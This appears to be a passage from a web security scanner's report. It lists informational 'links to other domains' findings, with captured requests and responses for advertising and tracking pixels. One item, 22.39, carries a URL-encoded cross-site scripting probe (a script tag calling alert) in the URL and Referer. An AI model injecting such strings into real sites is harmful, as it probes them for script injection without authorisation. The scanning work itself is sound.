Expires: Mon, 16 May 2011 01:40:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2464
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502" width = "1" height = "1" border = "0"><IMG SRC="http://bp.specificclick.net?pixid=99002087" width=0 height=0 border=0><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839" width = "1" height = "1" border = "0"><img src='http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=1269674253' width='1' height='1' />
<img height="1" width="1" src="http://view.atdmt.com/action/DPM_Helzberg_Homepage"/><img src="http://ads.bluelithium.com/pixel?id=601754&t=2" width="1" height="1" /><img src="https://ad.yieldmanager.com/pixel?id=628032&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2" width="1" height="1" />
<img src="http://ad.doubleclick.net/activity;src=2583709;type=helz1;cat=helzhp;ord=1;num=1269674253?" width=1 height=1 border=0>
<img src="http://action.mathtag.com/mm//HELZ//red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=1269674253" width="1" height="1" />
<img src="http://ads.adbrite.com/adserver/vdi/684339?d=110" height="1" width="1">
<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110" height="1" width="1">
<img src="http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days" height="1" width="1">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&guid=ON&script=0"/>
</div>
</noscript><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30" type="text/javascript"></script>
...[SNIP]...

22.33. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9459547300357.371?

The response contains the following links to other domains:

http://a.tribalfusion.com/i.cid?c=294813&d=30&page=landingPage
http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4
http://bp.specificclick.net/?pixid=99007235
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tosh_cs=1&betq=7046=395215
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=toshiba_cs=1&betq=11505=422668
http://media.fastclick.net/w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058
http://r.turn.com/r/beacon?b2=Z6z3HD7Ka9PFm_lTPlcJyUlQ-yO37BfURcbb7BumEMQAutjTrrs_D_o0Lv3V9pAvJVMIOj2uDziSnc27IJcNQA&cid=
http://switch.atdmt.com/action/Toshiba_Homepage
http://www.burstnet.com/enlightn/5562/F24E/

Request

GET /activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9459547300357.371? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:40:46 GMT
Expires: Mon, 16 May 2011 01:40:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1783
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://switch.atdmt.com/action/Toshiba_Homepage" height="1" width="1"><img src="http://media.fastclick.net/w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058" width="1" height="1" border="0"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=toshiba_cs=1&betq=11505=422668" width = "1" height = "1" border = "0"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tosh_cs=1&betq=7046=395215" width = "1" height = "1" border = "0"><img src='http://a.tribalfusion.com/i.cid?c=294813&d=30&page=landingPage' width='1' height='1' border='0'><IMG SRC="http://bp.specificclick.net?pixid=99007235" width=0 height=0 border=0><img border="0" src="http://r.turn.com/r/beacon?b2=Z6z3HD7Ka9PFm_lTPlcJyUlQ-yO37BfURcbb7BumEMQAutjTrrs_D_o0Lv3V9pAvJVMIOj2uDziSnc27IJcNQA&cid="><img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4"/><script type="text/javascript">
...[SNIP]...
</script><img src="http://www.burstnet.com/enlightn/5562//F24E/" width="0" height="0" border="0"></body>
...[SNIP]...

22.34. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1770367;type=pshol390;cat=psn_l603;ord=6840203220490.366?

The response contains the following links to other domains:

http://idcs.interclick.com/Segment.aspx?sid=3d84d9a0-01cd-403c-ac63-e21bcadc6176
https://idcs.interclick.com/Segment.aspx?sid=3d84d9a0-01cd-403c-ac63-e21bcadc6176

Request

GET /activityi;src=1770367;type=pshol390;cat=psn_l603;ord=6840203220490.366? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 15 May 2011 20:26:56 GMT
Expires: Sun, 15 May 2011 20:26:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 382
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://idcs.interclick.com/Segment.aspx?sid=3d84d9a0-01cd-403c-ac63-e21bcadc6176"/><img src="http://idcs.interclick.com/Segment.aspx?sid=3d84d9a0-01cd-403c-ac63-e21bcadc6176"/>
</body>
...[SNIP]...

22.35. http://fls.doubleclick.net/activityj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityj

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityj;src=2789293;type=dclus637;cat=dclus503;ord=1;num=7585084144957.363?

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=1278261&t=2
http://idcs.interclick.com/Segment.aspx?sid=4be8e9a4-55e6-44ee-9161-c8ef76b2a31f

Request

GET /activityj;src=2789293;type=dclus637;cat=dclus503;ord=1;num=7585084144957.363? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:26:07 GMT
Expires: Mon, 16 May 2011 01:26:07 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Content-Length: 213
X-XSS-Protection: 1; mode=block

document.write('<img src="http://ads.bluelithium.com/pixel?id=1278261&t=2" width="1" height="1" />');document.write('<img src="http://idcs.interclick.com/Segment.aspx?sid=4be8e9a4-55e6-44ee-9161-c8ef76b2a31f"/>');

22.36. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/809051/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:

http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH;size=728x90;alias=www.usatoday.com/travel/cruises_Top728x90;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508785597

The response contains the following link to another domain:

http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html

Request

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 942
Set-Cookie: JEB2=4DD077236E651A440C6EAF39F0005EB9;expires=Wed, 15 May 2013 1:19:45 GMT;domain=gannett.gcion.com;path=/

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("auto") != -1) rubSect = 7208;
else if (window.location.pathname.indexOf("mo
...[SNIP]...
ubSect = 7106;
else if (window.location.pathname.indexOf("tech") != -1) rubSect = 7107;
else if (window.location.pathname.indexOf("weather") != -1) rubSect = 7108;
else rubSect = 7102;
document.write('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...

22.37. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9942530385485090&output=html&h=90&slotname=7409232867&w=728&lmt=1305527557&flash=10.3.181&url=http%3A%2F%2Fsecureshopping.mcafee.com%2F&dt=1305509556443&bpp=3&shv=r20110509&jsv=r20110506&correlator=1305509557695&frm=0&adk=2067801485&ga_vid=934359654.1305509558&ga_sid=1305509558&ga_hid=579067022&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=1275&xpc=N75PYouOId&p=http%3A//secureshopping.mcafee.com

The response contains the following link to another domain:

http://ad.turn.com/server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=26005388&ahcid=1176968&bimpd=vdZkVJM3QxaI71kKLmsceZdJ9RnFRApAjFc4UA5mG135wdUoUiC5Q1HPXXJdmSbXZKPsp9v3PDJq4nug8RlPS8TBeaPUl7h5CbFMTJ3clnW2WwHfZiw5Ubg4AHeRFTeOqtqGkBUZ_niFSfOuLxHOYVCAueWAZTu0lF6s5dyMH0KZxrl8fFT7Zb-t61TjnLRccNlIsr9gAj5uikcAmMDdg6dE1iEB5xrt-7OPIK5R-kmPQnSmAIH4otq9UaLzNaUNKjjF0W52a_vcddgtoYB2koJqQPbg2fxY2ghlkXX7rkP3GbHcWHJECWDh_pSnr8guR6OmA-V7v7IuPvusR1pSU-oeTYzF-2jOW8WSMR0Sv-qQTUeGoA1YBjq4KIcVPzpVJ6XTb-XXauwv8fAsUcwB0bDGBOcxDF2t_Om_Sd5E6qgTATRwncXWhXpsADdzy7mL1_4OegRSAQFuCiaaREoZwrBvz00HpyKHzI3tnCJVYHCRKDpw3P6_Vokh7Wcml2N2oIvSlbN9XKd0jLLt0XzxROEraJvQxqR9-xgRqOyluanGcNnn58DS8r_TsOcdV0kx210k0C5Y4hCWwHITGP6mPNTbcfB2r9AC15SL679eJ0exb5p3kHJSsrGPw6fJ_W7SXLGKd1cbz5CFphcqTn_DY8XIOEE_VmOmyozgoopzImeIjgHkTlWhNjMob0WG4P_drzqs3D5yAyWgrnFqBRVyEMBBOZnjvxqJP_Xrgaah8EA7eJnwrpm54xvQ2eBZXdM0z3pEtsT7J70a3mE-vLqZNQ&acp=TdB-tgAFh0YK7CsSqBshPgJ9iYgmLGiFSFLeKQ&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-9942530385485090&output=html&h=90&slotname=7409232867&w=728&lmt=1305527557&flash=10.3.181&url=http%3A%2F%2Fsecureshopping.mcafee.com%2F&dt=1305509556443&bpp=3&shv=r20110509&jsv=r20110506&correlator=1305509557695&frm=0&adk=2067801485&ga_vid=934359654.1305509558&ga_sid=1305509558&ga_hid=579067022&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=1275&xpc=N75PYouOId&p=http%3A//secureshopping.mcafee.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 01:32:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 2045
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=26005388&ahcid=1176968&bimpd=vdZkVJM3QxaI71kKLmsceZdJ9RnFRApAjFc4UA5mG135wdUoUiC5Q1HPXXJdmSbXZKPsp9v3PDJq4nug8RlPS8TBeaPUl7h5CbFMTJ3clnW2WwHfZiw5Ubg4AHeRFTeOqtqGkBUZ_niFSfOuLxHOYVCAueWAZTu0lF6s5dyMH0KZxrl8fFT7Zb-t61TjnLRccNlIsr9gAj5uikcAmMDdg6dE1iEB5xrt-7OPIK5R-kmPQnSmAIH4otq9UaLzNaUNKjjF0W52a_vcddgtoYB2koJqQPbg2fxY2ghlkXX7rkP3GbHcWHJECWDh_pSnr8guR6OmA-V7v7IuPvusR1pSU-oeTYzF-2jOW8WSMR0Sv-qQTUeGoA1YBjq4KIcVPzpVJ6XTb-XXauwv8fAsUcwB0bDGBOcxDF2t_Om_Sd5E6qgTATRwncXWhXpsADdzy7mL1_4OegRSAQFuCiaaREoZwrBvz00HpyKHzI3tnCJVYHCRKDpw3P6_Vokh7Wcml2N2oIvSlbN9XKd0jLLt0XzxROEraJvQxqR9-xgRqOyluanGcNnn58DS8r_TsOcdV0kx210k0C5Y4hCWwHITGP6mPNTbcfB2r9AC15SL679eJ0exb5p3kHJSsrGPw6fJ_W7SXLGKd1cbz5CFphcqTn_DY8XIOEE_VmOmyozgoopzImeIjgHkTlWhNjMob0WG4P_drzqs3D5yAyWgrnFqBRVyEMBBOZnjvxqJP_Xrgaah8EA7eJnwrpm54xvQ2eBZXdM0z3pEtsT7J70a3mE-vLqZNQ&acp=TdB-tgAFh0YK7CsSqBshPgJ9iYgmLGiFSFLeKQ&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D"></script>
...[SNIP]...

22.38. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5438710172241065&output=html&h=60&slotname=9579777178&w=468&lmt=1305526807&flash=10.3.181&url=http%3A%2F%2Fwww.passporterboards.com%2Fforums%2Ftouring-world-parks-walt-disney-world%2F243302-enchanted-tiki-room-news.html&dt=1305508794652&bpp=30&shv=r20110509&jsv=r20110506&prev_slotnames=9579777178&correlator=1305508795096&frm=0&adk=3560483373&ga_vid=1172158137.1305508795&ga_sid=1305508795&ga_hid=1710727111&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=2&dtd=M&xpc=6SI4sb4xGb&p=http%3A//www.passporterboards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html%26hl%3Den%26client%3Dca-pub-5438710172241065%26adU%3DVillanovaU.com/SixSigma%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHpQq5Hc67B0S0sB7a78H51hASg8g

Request

GET /pagead/ads?client=ca-pub-5438710172241065&output=html&h=60&slotname=9579777178&w=468&lmt=1305526807&flash=10.3.181&url=http%3A%2F%2Fwww.passporterboards.com%2Fforums%2Ftouring-world-parks-walt-disney-world%2F243302-enchanted-tiki-room-news.html&dt=1305508794652&bpp=30&shv=r20110509&jsv=r20110506&prev_slotnames=9579777178&correlator=1305508795096&frm=0&adk=3560483373&ga_vid=1172158137.1305508795&ga_sid=1305508795&ga_hid=1710727111&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=2&dtd=M&xpc=6SI4sb4xGb&p=http%3A//www.passporterboards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 01:20:08 GMT
Server: cafe
Cache-Control: private
Content-Length: 4679
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html%26hl%3Den%26client%3Dca-pub-5438710172241065%26adU%3DVillanovaU.com/SixSigma%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHpQq5Hc67B0S0sB7a78H51hASg8g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.39. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4339714761096906&output=html&h=280&slotname=8386713150&w=336&lmt=1305495089&flash=0&url=http%3A%2F%2Fpastebin.com%2Ffavicon.ico50732%2522%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253Ed0c46a64a0&dt=1305495094699&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305495096958&frm=0&adk=1636607917&ga_vid=1357599510.1305495050&ga_sid=1305495050&ga_hid=1982602333&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=39&biw=1121&bih=765&ref=http%3A%2F%2Fburp%2Fshow%2F3&fu=0&ifi=1&dtd=4316&xpc=8ciulVOZFq&p=http%3A//pastebin.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pastebin.com/favicon.ico50732%252522%25253E%25253Cscript%25253Ealert(%252522FAVICON%252522)%25253C/script%25253Ed0c46a64a0%26hl%3Den%26client%3Dca-pub-4339714761096906%26adU%3Dhe.net%26adT%3DData%2BCenter%2BColocation%26adU%3DQuiBids.com%26adT%3DLaptops%2BSold%2Bfor%2B%252433.33%26adU%3Dwww.Register.com%26adT%3DRegister%2BDomain%2BNames%26adU%3Dwww.webcrawler.com%26adT%3DDomain%2BNames%2BPaypal%26gl%3DUS&usg=AFQjCNG4t9XZ8Ujsw2oAJOpOuOm6UTGfRQ

Request

GET /pagead/ads?client=ca-pub-4339714761096906&output=html&h=280&slotname=8386713150&w=336&lmt=1305495089&flash=0&url=http%3A%2F%2Fpastebin.com%2Ffavicon.ico50732%2522%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253Ed0c46a64a0&dt=1305495094699&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305495096958&frm=0&adk=1636607917&ga_vid=1357599510.1305495050&ga_sid=1305495050&ga_hid=1982602333&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=5&u_nmime=39&biw=1121&bih=765&ref=http%3A%2F%2Fburp%2Fshow%2F3&fu=0&ifi=1&dtd=4316&xpc=8ciulVOZFq&p=http%3A//pastebin.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/favicon.ico50732%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed0c46a64a0
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 15 May 2011 21:31:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 13811
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0066cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pastebin.com/favicon.ico50732%252522%25253E%25253Cscript%25253Ealert(%252522FAVICON%252522)%25253C/script%25253Ed0c46a64a0%26hl%3Den%26client%3Dca-pub-4339714761096906%26adU%3Dhe.net%26adT%3DData%2BCenter%2BColocation%26adU%3DQuiBids.com%26adT%3DLaptops%2BSold%2Bfor%2B%252433.33%26adU%3Dwww.Register.com%26adT%3DRegister%2BDomain%2BNames%26adU%3Dwww.webcrawler.com%26adT%3DDomain%2BNames%2BPaypal%26gl%3DUS&usg=AFQjCNG4t9XZ8Ujsw2oAJOpOuOm6UTGfRQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.40. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5438710172241065&output=html&h=280&slotname=3081376442&w=336&lmt=1305526807&flash=10.3.181&url=http%3A%2F%2Fwww.passporterboards.com%2Fforums%2Ftouring-world-parks-walt-disney-world%2F243302-enchanted-tiki-room-news.html&dt=1305508794881&bpp=13&shv=r20110509&jsv=r20110506&prev_slotnames=9579777178%2C9579777178&correlator=1305508795096&frm=0&adk=1078039243&ga_vid=1172158137.1305508795&ga_sid=1305508795&ga_hid=1710727111&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=3&dtd=M&xpc=hsGgaorwsh&p=http%3A//www.passporterboards.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
